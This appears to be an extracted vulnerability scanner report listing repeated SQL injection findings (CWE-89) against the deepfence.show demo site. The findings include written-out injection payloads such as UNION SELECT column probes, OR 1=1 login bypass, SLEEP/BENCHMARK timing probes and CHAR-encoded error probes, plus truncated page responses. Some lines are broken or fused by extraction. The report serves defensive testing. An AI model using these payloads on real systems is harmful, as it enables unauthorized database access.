[(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #523\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #524\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(deepfence.io 1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #525\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #526\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\" or \"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #527\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #528\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 27--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #529Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #530\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #531\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #532\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #533\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #534\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #535\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #536\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 